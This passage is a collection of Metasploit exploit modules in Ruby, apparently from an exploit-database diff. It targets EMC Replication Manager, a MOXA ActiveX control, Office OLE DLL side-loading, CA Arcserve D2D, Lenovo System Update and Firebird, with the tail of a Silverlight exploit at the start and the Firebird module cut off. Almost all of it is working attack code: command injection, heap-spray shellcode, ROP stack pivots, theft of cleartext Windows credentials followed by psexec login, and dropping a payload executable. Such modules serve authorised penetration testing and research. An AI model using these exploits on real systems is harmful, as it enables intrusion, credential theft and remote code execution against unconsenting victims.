@xaml = MANIFEST.gsub(/SilverApp1\.dll/, @dll_name)
super
end
def exploit_template(cli, target_info)
my_payload = get_payload(cli, target_info)
# Align to 4 bytes the x86 payload
while my_payload.length % 4 != 0
my_payload = "\x90" + my_payload
end
my_payload = Rex::Text.encode_base64(my_payload)
html_template = <<-EOF
<html>
<!-- saved from url=(0014)about:internet -->
<head>
<title>Silverlight Application</title>
<style type="text/css">
html, body { height: 100%; overflow: auto; }
body { padding: 0; margin: 0; }
#form1 { height: 99%; }
#silverlightControlHost { text-align:center; }
</style>
</head>
<body>
<form id="form1" runat="server" >
<div id="silverlightControlHost">
<object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="100%" height="100%">
<param name="source" value="<%= @xap_name %>"/>
<param name="background" value="white" />
<param name="InitParams" value="payload=<%= my_payload %>" />
</object>
</div>
</form>
</body>
</html>
EOF
return html_template, binding()
end
def on_request_exploit(cli, request, target_info)
print_status("request: #{request.uri}")
if request.uri =~ /#{@xap_name}$/
print_status("Sending XAP...")
send_response(cli, @xap, { 'Content-Type' => 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })
elsif request.uri =~ /#{@dll_name}$/
print_status("Sending DLL...")
send_response(cli, @dll, { 'Content-Type' => 'application/octect-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })
elsif request.uri =~ /AppManifest.xaml$/
print_status("Sending XAML...")
send_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })
else
print_status("Sending HTML...")
send_exploit_html(cli, exploit_template(cli, target_info))
end
end
end

127
platforms/windows/local/41704.rb Executable file
View file

@ -0,0 +1,127 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC Replication Manager Command Execution',
'Description' => %q{
This module exploits a remote command-injection vulnerability in EMC Replication Manager
client (irccd.exe). By sending a specially crafted message invoking RunProgram function an
attacker may be able to execute arbitrary commands with SYSTEM privileges. Affected
products are EMC Replication Manager < 5.3. This module has been successfully tested
against EMC Replication Manager 5.2.1 on XP/W2003. EMC Networker Module for Microsoft
Applications 2.1 and 2.2 may be vulnerable too although this module have not been tested
against these products.
},
'Author' =>
[
'Unknown', #Initial discovery
'Davy Douhine' #MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-0647' ],
[ 'OSVDB', '70853' ],
[ 'BID', '46235' ],
[ 'URL', 'http://www.securityfocus.com/archive/1/516260' ],
[ 'ZDI', '11-061' ]
],
'DisclosureDate' => 'Feb 07 2011',
'Platform' => 'win',
'Arch' => ARCH_X86,
'Payload' =>
{
'Space' => 4096,
'DisableNops' => true
},
'Targets' =>
[
# Tested on Windows XP and Windows 2003
[ 'EMC Replication Manager 5.2.1 / Windows Native Payload', { } ]
],
'CmdStagerFlavor' => 'vbs',
'DefaultOptions' =>
{
'WfsDelay' => 5
},
'DefaultTarget' => 0,
'Privileged' => true
))
register_options(
[
Opt::RPORT(6542)
], self.class)
end
def exploit
execute_cmdstager({:linemax => 5000})
end
def execute_command(cmd, opts)
connect
hello = "1HELLOEMC00000000000000000000000"
vprint_status("Sending hello...")
sock.put(hello)
result = sock.get_once || ''
if result =~ /RAWHELLO/
vprint_good("Expected hello response")
else
disconnect
fail_with(Failure::Unknown, "Failed to hello the server")
end
start_session = "EMC_Len0000000136<?xml version=\"1.0\" encoding=\"UTF-8\"?><ir_message ir_sessionId=0000 ir_type=\"ClientStartSession\" <ir_version>1</ir_version></ir_message>"
vprint_status("Starting session...")
sock.put(start_session)
result = sock.get_once || ''
if result =~ /EMC/
vprint_good("A session has been created. Good.")
else
disconnect
fail_with(Failure::Unknown, "Failed to create the session")
end
run_prog = "<?xml version=\"1.0\" encoding=\"UTF-8\"?> "
run_prog << "<ir_message ir_sessionId=\"01111\" ir_requestId=\"00000\" ir_type=\"RunProgram\" ir_status=\"0\"><ir_runProgramCommand>cmd /c #{cmd}</ir_runProgramCommand>"
run_prog << "<ir_runProgramAppInfo><?xml version="1.0" encoding="UTF-8"?> <ir_message ir_sessionId="00000" ir_requestId="00000" "
run_prog << "ir_type="App Info" ir_status="0"><IR_groupEntry IR_groupType="anywriter" IR_groupName="CM1109A1" IR_groupId="1" "
run_prog << "><?xml version="1.0" encoding="UTF-8"? > <ir_message ir_sessionId="00000" "
run_prog << "ir_requestId="00000"ir_type="App Info" ir_status="0"><aa_anywriter_ccr_node>CM1109A1"
run_prog << "</aa_anywriter_ccr_node><aa_anywriter_fail_1018>0</aa_anywriter_fail_1018><aa_anywriter_fail_1019>0"
run_prog << "</aa_anywriter_fail_1019><aa_anywriter_fail_1022>0</aa_anywriter_fail_1022><aa_anywriter_runeseutil>1"
run_prog << "</aa_anywriter_runeseutil><aa_anywriter_ccr_role>2</aa_anywriter_ccr_role><aa_anywriter_prescript>"
run_prog << "</aa_anywriter_prescript><aa_anywriter_postscript></aa_anywriter_postscript><aa_anywriter_backuptype>1"
run_prog << "</aa_anywriter_backuptype><aa_anywriter_fail_447>0</aa_anywriter_fail_447><aa_anywriter_fail_448>0"
run_prog << "</aa_anywriter_fail_448><aa_exchange_ignore_all>0</aa_exchange_ignore_all><aa_anywriter_sthread_eseutil>0&amp"
run_prog << ";lt;/aa_anywriter_sthread_eseutil><aa_anywriter_required_logs>0</aa_anywriter_required_logs><aa_anywriter_required_logs_path"
run_prog << "></aa_anywriter_required_logs_path><aa_anywriter_throttle>1</aa_anywriter_throttle><aa_anywriter_throttle_ios>300"
run_prog << "</aa_anywriter_throttle_ios><aa_anywriter_throttle_dur>1000</aa_anywriter_throttle_dur><aa_backup_username>"
run_prog << "</aa_backup_username><aa_backup_password></aa_backup_password><aa_exchange_checksince>1335208339"
run_prog << "</aa_exchange_checksince> </ir_message></IR_groupEntry> </ir_message></ir_runProgramAppInfo>"
run_prog << "<ir_applicationType>anywriter</ir_applicationType><ir_runProgramType>backup</ir_runProgramType> </ir_message>"
run_prog_header = "EMC_Len000000"
run_prog_packet = run_prog_header + run_prog.length.to_s + run_prog
vprint_status("Executing command....")
sock.put(run_prog_packet)
sock.get_once(-1, 1)
end_string = Rex::Text.rand_text_alpha(rand(10)+32)
sock.put(end_string)
sock.get_once(-1, 1)
disconnect
end
end

102
platforms/windows/local/41705.rb Executable file
View file

@ -0,0 +1,102 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'MOXA MediaDBPlayback ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When
sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5)
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'References' =>
[
[ 'CVE', '2010-4742' ],
[ 'OSVDB', '68986'],
[ 'URL', 'http://www.moxa.com' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0a0a0a0a } ]
],
'DisclosureDate' => 'Oct 19 2010',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
], self.class)
end
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack('L'))
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
content = %Q|
<html>
<object id ='#{vname}' classid='clsid:5B32067A-121B-49DE-8182-91EB13DDF8D6'></object>
<script language ="javascript">
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{nops}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "";
for (#{var_i} = 0; #{var_i} < 14500; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.PlayFileName = #{rand8};
</script>
</html>
|
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(content)
end
end

280
platforms/windows/local/41706.rb Executable file
View file

@ -0,0 +1,280 @@
require 'zip'
require 'base64'
require 'msf/core'
require 'rex/ole'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Office OLE Multiple DLL Side Loading Vulnerabilities',
'Description' => %q{
Multiple DLL side loading vulnerabilities were found in various COM components.
These issues can be exploited by loading various these components as an embedded
OLE object. When instantiating a vulnerable object Windows will try to load one
or more DLLs from the current working directory. If an attacker convinces the
victim to open a specially crafted (Office) document from a directory also
containing the attacker's DLL file, it is possible to execute arbitrary code with
the privileges of the target user. This can potentially result in the attacker
taking complete control of the affected system.
},
'Author' => 'Yorick Koster',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-6132'],
['CVE', '2015-6128'],
['CVE', '2015-6133'],
['CVE', '2016-0041'],
['CVE', '2016-0100'],
['CVE', '2016-3235'],
['MSB', 'MS15-132'],
['MSB', 'MS16-014'],
['MSB', 'MS16-025'],
['MSB', 'MS16-041'],
['MSB', 'MS16-070'],
['URL', 'https://securify.nl/advisory/SFY20150801/com__services_dll_side_loading_vulnerability.html'],
['URL', 'https://securify.nl/advisory/SFY20150805/event_viewer_snapin_multiple_dll_side_loading_vulnerabilities.html'],
['URL', 'https://securify.nl/advisory/SFY20150803/windows_authentication_ui_dll_side_loading_vulnerability.html'],
['URL', 'https://securify.nl/advisory/SFY20151102/shutdown_ux_dll_side_loading_vulnerability.html'],
['URL', 'https://securify.nl/advisory/SFY20150802/shockwave_flash_object_dll_side_loading_vulnerability.html'],
['URL', 'https://securify.nl/advisory/SFY20150806/ole_db_provider_for_oracle_multiple_dll_side_loading_vulnerabilities.html'],
['URL', 'https://securify.nl/advisory/SFY20150905/nps_datastore_server_dll_side_loading_vulnerability.html'],
['URL', 'https://securify.nl/advisory/SFY20150906/bda_mpeg2_transport_information_filter_dll_side_loading_vulnerability.html'],
['URL', 'https://securify.nl/advisory/SFY20151101/mapsupdatetask_task_dll_side_loading_vulnerability.html'],
['URL', 'https://securify.nl/advisory/SFY20150904/windows_mail_find_people_dll_side_loading_vulnerability.html'],
['URL', 'https://securify.nl/advisory/SFY20150804/microsoft_visio_multiple_dll_side_loading_vulnerabilities.html'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'PAYLOAD' => 'windows/exec',
'CMD' => 'C:\\Windows\\System32\\calc.exe',
},
'Payload' => { 'Space' => 2048, },
'Platform' => 'win',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Targets' =>
[
[ 'All', {} ],
[
'COM+ Services / Windows Vista - 10 / Office 2007 - 2016 (MS15-132)',
{
'DLL' => 'mqrt.dll',
# {ecabafc9-7f19-11d2-978e-0000f8757e2a}
'CLSID' => "\xC9\xAF\xAB\xEC\x19\x7F\xD2\x11\x97\x8E\x00\x00\xF8\x75\x7E\x2A"
}
],
[
'Shockwave Flash Object / Windows 10 / Office 2013 (APSB15-28)',
{
'DLL' => 'spframe.dll',
# {D27CDB6E-AE6D-11cf-96B8-444553540000}
'CLSID' => "\x6E\xDB\x7C\xD2\x6D\xAE\xCF\x11\x96\xB8\x44\x45\x53\x54\x00\x00"
}
],
[
'Windows Authentication UI / Windows 10 / Office 2013 - 2016 (MS15-132)',
{
'DLL' => 'wuaext.dll',
# {D93CE8B5-3BF8-462C-A03F-DED2730078BA}
'CLSID' => "\xB5\xE8\x3C\xD9\xF8\x3B\x2C\x46\xA0\x3F\xDE\xD2\x73\x00\x78\xBA"
}
],
[
'Shutdown UX / Windows 10 / Office 2016 (MS15-132)',
{
'DLL' => 'wuaext.dll',
# {14ce31dc-abc2-484c-b061-cf3416aed8ff}
'CLSID' => "\xDC\x31\xCE\x14\xC2\xAB\x4C\x48\xB0\x61\xCF\x34\x16\xAE\xD8\xFF"
}
],
[
'MapUpdateTask Tasks / Windows 10 / Office 2016 (MS16-014)',
{
'DLL' => 'phoneinfo.dll',
# {B9033E87-33CF-4D77-BC9B-895AFBBA72E4}
'CLSID' => "\x87\x3E\x03\xB9\xCF\x33\x77\x4D\xBC\x9B\x89\x5A\xFB\xBA\x72\xE4"
}
],
[
'Microsoft Visio 2010 / Windows 7 (MS16-070)',
{
'DLL' => 'msoutls.dll',
# 6C92B806-B900-4392-89F7-2ED4B4C23211}
'CLSID' => "\x06\xB8\x92\x6C\x00\xB9\x92\x43\x89\xF7\x2E\xD4\xB4\xC2\x32\x11"
}
],
[
'Event Viewer Snapin / Windows Vista - 7 / Office 2007 - 2013 (MS15-132)',
{
'DLL' => 'elsext.dll',
# {394C052E-B830-11D0-9A86-00C04FD8DBF7}
'CLSID' => "\x2E\x05\x4C\x39\x30\xB8\xD0\x11\x9A\x86\x00\xC0\x4F\xD8\xDB\xF7"
}
],
[
'OLE DB Provider for Oracle / Windows Vista - 7 / Office 2007 - 2013 (MS16-014)',
{
'DLL' => 'oci.dll',
# {e8cc4cbf-fdff-11d0-b865-00a0c9081c1d}
'CLSID' => "\xBF\x4C\xCC\xE8\xFF\xFD\xD0\x11\xB8\x65\x00\xA0\xC9\x08\x1C\x1D"
}
],
[
'Windows Mail Find People / Windows Vista / Office 2010 (MS16-025)',
{
'DLL' => 'wab32res.dll',
# {32714800-2E5F-11d0-8B85-00AA0044F941}
'CLSID' => "\x00\x48\x71\x32\x5F\x2E\xD0\x11\x8B\x85\x00\xAA\x00\x44\xF9\x41"
}
],
[
'NPS Datastore server / Windows Vista / Office 2010 (MS16-014)',
{
'DLL' => 'iasdatastore2.dll',
# {48da6741-1bf0-4a44-8325-293086c79077}
'CLSID' => "\x41\x67\xDA\x48\xF0\x1B\x44\x4A\x83\x25\x29\x30\x86\xC7\x90\x77"
}
],
[
'BDA MPEG2 Transport Information Filter / Windows Vista / Office 2010 (MS16-014)',
{
'DLL' => 'ehTrace.dll',
# {FC772AB0-0C7F-11D3-8FF2-00A0C9224CF4}
'CLSID' => "\xB0\x2A\x77\xFC\x7F\x0C\xD3\x11\x8F\xF2\x00\xA0\xC9\x22\x4C\xF4"
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Dec 8 2015',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx']),
], self.class)
end
def exploit
if target.name == 'All'
targets = @targets
else
targets = [ target ]
end
@arch.each do |a|
exploit_regenerate_payload('win', a, nil)
targets.each do |t|
if t.name == 'All'
next
end
print_status("Using target #{t.name}")
dll_name = t['DLL']
if target.name == 'All'
ppsx_name = t.name.split(/\//).first + ".ppsx"
else
ppsx_name = datastore['FILENAME']
end
print_status("Creating the payload DLL (#{a})...")
opts = {}
opts[:arch] = [ a ]
dll = generate_payload_dll(opts)
dll_path = store_file(dll, a, dll_name)
print_good("#{dll_name} stored at #{dll_path}, copy it to a remote share")
print_status("Creating the PPSX file...")
ppsx = get_ppsx(t['CLSID'])
ppsx_path = store_file(ppsx, a, ppsx_name)
print_good("#{ppsx_name} stored at #{ppsx_path}, copy it to a remote share")
end
end
end
def store_file(data, subdir, filename)
ltype = "exploit.fileformat.#{self.shortname}"
if ! ::File.directory?(Msf::Config.local_directory)
FileUtils.mkdir_p(Msf::Config.local_directory)
end
subdir.gsub!(/[^a-z0-9\.\_\-]+/i, '')
if ! ::File.directory?(Msf::Config.local_directory + "/" + subdir)
FileUtils.mkdir_p(Msf::Config.local_directory + "/" + subdir)
end
if filename and not filename.empty?
if filename =~ /(.*)\.(.*)/
ext = $2
fname = $1
else
fname = filename
end
else
fname = "local_#{Time.now.utc.to_i}"
end
fname = ::File.split(fname).last
fname.gsub!(/[^a-z0-9\.\_\-]+/i, '')
fname << ".#{ext}"
path = File.join(Msf::Config.local_directory + "/" + subdir, fname)
full_path = ::File.expand_path(path)
File.open(full_path, "wb") { |fd| fd.write(data) }
report_note(:data => full_path.dup, :type => "#{ltype}.localpath")
full_path.dup
end
def create_ole(clsid)
ole_tmp = Rex::Quickfile.new('ole')
stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)
stm = stg.create_stream("\x01OLE10Native")
stm.close
directory = stg.instance_variable_get(:@directory)
directory.each_entry do |entry|
if entry.instance_variable_get(:@_ab) == 'Root Entry'
clsid = Rex::OLE::CLSID.new(clsid)
entry.instance_variable_set(:@_clsId, clsid)
end
end
# write to disk
stg.close
ole_contents = File.read(ole_tmp.path)
ole_tmp.close
ole_tmp.unlink
ole_contents
end
def get_ppsx(clsid)
path = ::File.join(Msf::Config.data_directory, 'exploits', 'office_ole_multiple_dll_hijack.ppsx')
fd = ::File.open(path, "rb")
data = fd.read(fd.stat.size)
fd.close
ppsx = Rex::Zip::Archive.new
Zip::InputStream.open(StringIO.new(data)) do |zis|
while entry = zis.get_next_entry
ppsx.add_file(entry.name, zis.read)
end
end
ppsx.add_file('/ppt/embeddings/oleObject1.bin', create_ole(clsid))
ppsx.pack
end
end

204
platforms/windows/local/41707.rb Executable file
View file

@ -0,0 +1,204 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'CA Arcserve D2D GWT RPC Credential Information Disclosure',
'Description' => %q{
This module exploits an information disclosure vulnerability in the CA Arcserve
D2D r15 web server. The information disclosure can be triggered by sending a
specially crafted RPC request to the homepage servlet. This causes CA Arcserve to
disclosure the username and password in cleartext used for authentication. This
username and password pair are Windows credentials with Administrator access.
},
'Author' =>
[
'bannedit', # metasploit module
'rgod', # original public exploit
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-3011' ],
[ 'OSVDB', '74162' ],
[ 'EDB', '17574' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Privileged' => true,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0d\x0a"
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
],
'DisclosureDate' => 'Jul 25 2011',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8014),
], self.class )
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
module_fullname: fullname,
post_reference_name: self.refname,
private_data: opts[:password],
origin_type: :service,
private_type: :password,
username: opts[:user]
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: opts[:status],
last_attempted_at: DateTime.now
}.merge(service_data)
create_credential_login(login_data)
end
def exploit
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
data = "5|0|4|"
data << "http://#{datastore['RHOST']}:#{datastore['RPORT']}"
data << "/contents/"
data << "|2C6B33BED38F825C48AE73C093241510|"
data << "com.ca.arcflash.ui.client.homepage.HomepageService"
data << "|getLocalHost|1|2|3|4|0|"
cookie = "donotshowgettingstarted=%7B%22state%22%3Atrue%7D"
res = send_request_raw({
'uri' => '/contents/service/homepage',
'version' => '1.1',
'method' => 'POST',
'cookie' => cookie,
'data' => data,
'headers' =>
{
'Content-Type' => "text/x-gwt-rpc; charset=utf-8",
'Content-Length' => data.length
}
}, 5)
if not res
fail_with(Failure::NotFound, 'The server did not respond to our request')
end
resp = res.to_s.split(',')
user_index = resp.index("\"user\"")
pass_index = resp.index("\"password\"")
if user_index.nil? and pass_index.nil?
# Not a vulnerable server (blank user/pass doesn't help us)
fail_with(Failure::NotFound, 'The server did not return credentials')
end
user = resp[user_index+1].gsub(/\"/, "")
pass = ""
if pass_index
pass = resp[pass_index+1].gsub(/\"/, "")
end
srvc = {
:host => datastore['RHOST'],
:port => datastore['RPORT'],
:proto => 'tcp',
:name => 'http',
:info => res.headers['Server'] || ""
}
report_service(srvc)
if user.nil? or pass.nil?
print_error("Failed to collect the username and password")
return
end
print_good("Collected credentials User: '#{user}' Password: '#{pass}'")
# try psexec on the remote host
psexec = framework.exploits.create("windows/smb/psexec")
psexec.register_parent(self)
psexec.datastore['PAYLOAD'] = self.datastore['PAYLOAD']
if self.datastore['LHOST'] and self.datastore['LPORT']
psexec.datastore['LHOST'] = self.datastore['LHOST']
psexec.datastore['LPORT'] = self.datastore['LPORT']
end
psexec.datastore['RHOST'] = self.datastore['RHOST']
psexec.datastore['DisablePayloadHandler'] = true
psexec.datastore['SMBPass'] = pass
psexec.datastore['SMBUser'] = user
print_status("Attempting to login via windows/smb/psexec")
# this is kind of nasty would be better to split psexec code out to a mixin (on the TODO List)
begin
psexec.exploit_simple(
'LocalInput' => self.user_input,
'LocalOutput' => self.user_output,
'Payload' => psexec.datastore['PAYLOAD'],
'RunAsJob' => true
)
rescue
report_cred(
ip: datastore['RHOST'],
port: 445,
service_name: 'smb',
user: user,
password: pass,
status: Metasploit::Model::Login::Status::INCORRECT
)
print_status("Login attempt using windows/smb/psexec failed")
print_status("Credentials have been stored and may be useful for authentication against other services.")
# report the auth
return
end
# report the auth
report_cred(
ip: datastore['RHOST'],
port: 445,
service_name: 'smb',
user: user,
password: pass,
status: Metasploit::Model::Login::Status::SUCCESSFUL
)
handler
end
end

193
platforms/windows/local/41708.rb Executable file
View file

@ -0,0 +1,193 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
include Msf::Exploit::EXE
include Msf::Post::File
include Msf::Exploit::FileDropper
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Services
Rank = ExcellentRanking
def initialize(info={})
super(update_info(info, {
'Name' => 'Lenovo System Update Privilege Escalation',
'Description' => %q{
The named pipe, \SUPipeServer, can be accessed by normal users to interact with the
System update service. The service provides the possibility to execute arbitrary
commands as SYSTEM if a valid security token is provided. This token can be generated
by calling the GetSystemInfoData function in the DLL tvsutil.dll. Please, note that the
System Update is stopped by default but can be started/stopped calling the Executable
ConfigService.exe.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Michael Milvich', # vulnerability discovery, advisory
'Sofiane Talmat', # vulnerability discovery, advisory
'h0ng10' # Metasploit module
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'SessionTypes' => ['meterpreter'],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Targets' =>
[
[ 'Windows', { } ]
],
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'References' =>
[
['OSVDB', '121522'],
['CVE', '2015-2219'],
['URL', 'http://www.ioactive.com/pdfs/Lenovo_System_Update_Multiple_Privilege_Escalations.pdf']
],
'DisclosureDate' => 'Apr 12 2015',
'DefaultTarget' => 0
}))
register_options([
OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)']),
OptInt.new('Sleep', [true, 'Time to sleep while service starts (seconds)', 4]),
], self.class)
end
def check
os = sysinfo['OS']
unless os =~ /windows/i
return Exploit::CheckCode::Safe
end
svc = service_info('SUService')
if svc && svc[:display] =~ /System Update/
vprint_good("Found service '#{svc[:display]}'")
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def write_named_pipe(pipe, command)
invalid_handle_value = 0xFFFFFFFF
r = session.railgun.kernel32.CreateFileA(pipe, 'GENERIC_READ | GENERIC_WRITE', 0x3, nil, 'OPEN_EXISTING', 'FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL', 0)
handle = r['return']
if handle == invalid_handle_value
fail_with(Failure::NoTarget, "#{pipe} named pipe not found")
else
vprint_good("Opended #{pipe}! Proceeding...")
end
begin
# First, write the string length as Int32 value
w = client.railgun.kernel32.WriteFile(handle, [command.length].pack('l'), 4, 4, nil)
if w['return'] == false
print_error('The was an error writing to pipe, check permissions')
return false
end
# Then we send the real command
w = client.railgun.kernel32.WriteFile(handle, command, command.length, 4, nil)
if w['return'] == false
print_error('The was an error writing to pipe, check permissions')
return false
end
ensure
session.railgun.kernel32.CloseHandle(handle)
end
true
end
def get_security_token(lenovo_directory)
unless client.railgun.get_dll('tvsutil')
client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll")
client.railgun.add_function('tvsutil', 'GetSystemInfoData', 'DWORD', [['PWCHAR', 'systeminfo', 'out']], nil, 'cdecl')
end
dll_response = client.railgun.tvsutil.GetSystemInfoData(256)
dll_response['systeminfo'][0,40]
end
def config_service(lenovo_directory, option)
cmd_exec("#{lenovo_directory}\\ConfigService.exe #{option}")
end
def exploit
if is_system?
fail_with(Failure::NoTarget, 'Session is already elevated')
end
su_directory = service_info('SUService')[:path][1..-16]
print_status('Starting service via ConfigService.exe')
config_service(su_directory, 'start')
print_status('Giving the service some time to start...')
Rex.sleep(datastore['Sleep'])
print_status("Getting security token...")
token = get_security_token(su_directory)
vprint_good("Security token is: #{token}")
if datastore['WritableDir'].nil? || datastore['WritableDir'].empty?
temp_dir = get_env('TEMP')
else
temp_dir = datastore['WritableDir']
end
print_status("Using #{temp_dir} to drop the payload")
begin
cd(temp_dir)
rescue Rex::Post::Meterpreter::RequestError
fail_with(Failure::BadConfig, "Failed to use the #{temp_dir} directory")
end
print_status('Writing malicious exe to remote filesystem')
write_path = pwd
exe_name = "#{rand_text_alpha(10 + rand(10))}.exe"
begin
write_file(exe_name, generate_payload_exe)
register_file_for_cleanup("#{write_path}\\#{exe_name}")
rescue Rex::Post::Meterpreter::RequestError
fail_with(Failure::Unknown, "Failed to drop payload into #{temp_dir}")
end
print_status('Sending Execute command to update service')
begin
write_res = write_named_pipe("\\\\.\\pipe\\SUPipeServer", "/execute #{exe_name} /arguments /directory #{write_path} /type COMMAND /securitycode #{token}")
rescue Rex::Post::Meterpreter::RequestError
fail_with(Failure::Unknown, 'Failed to write to pipe')
end
unless write_res
fail_with(Failure::Unknown, 'Failed to write to pipe')
end
print_status('Stopping service via ConfigService.exe')
config_service(su_directory, 'stop')
end
end

264
platforms/windows/local/41709.rb Executable file
View file

@ -0,0 +1,264 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize
super(
'Name' => 'Firebird Relational Database CNCT Group Number Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability in Firebird SQL Server. A specially
crafted packet can be sent which will overwrite a pointer allowing the attacker to
control where data is read from. Shortly, following the controlled read, the
pointer is called resulting in code execution.
The vulnerability exists with a group number extracted from the CNCT information,
which is sent by the client, and whose size is not properly checked.
This module uses an existing call to memcpy, just prior to the vulnerable code,
which allows a small amount of data to be written to the stack. A two-phases
stackpivot allows to execute the ROP chain which ultimately is used to execute
VirtualAlloc and bypass DEP.
},
'Author' => 'Spencer McIntyre',
'Arch' => ARCH_X86,
'Platform' => 'win',
'References' =>
[
[ 'CVE', '2013-2492' ],
[ 'OSVDB', '91044' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh'
},
'Payload' =>
{
# Stackpivot => mov eax,fs:[0x18] # add eax,8 # mov esp,[eax]
'Prepend' => "\x64\xa1\x18\x00\x00\x00\x83\xc0\x08\x8b\x20",
'Space' => 400,
'BadChars' => "\x00\x0a\x0d"
},
'Targets' =>
[
# pivots are pointers to stack pivots of size 0x28
[ 'Windows FB 2.5.2.26539', { 'pivot' => 0x005ae1fc, 'rop_nop' => 0x005b0384, 'rop_pop' => 0x4a831344 } ],
[ 'Windows FB 2.5.1.26351', { 'pivot' => 0x4add2302, 'rop_nop' => 0x00424a50, 'rop_pop' => 0x00656472 } ],
[ 'Windows FB 2.1.5.18496', { 'pivot' => 0x4ad5df4d, 'rop_nop' => 0x0042ba8c, 'rop_pop' => 0x005763d5 } ],
[ 'Windows FB 2.1.4.18393', { 'pivot' => 0x4adf4ed5, 'rop_nop' => 0x00423b82, 'rop_pop' => 0x4a843429 } ],
[ 'Debug', { 'pivot' => 0xdead1337, 'rop_nop' => 0xdead1337, 'rop_pop' => 0xdead1337 } ]
],
'DefaultTarget' => 0,
'Privileged' => true,
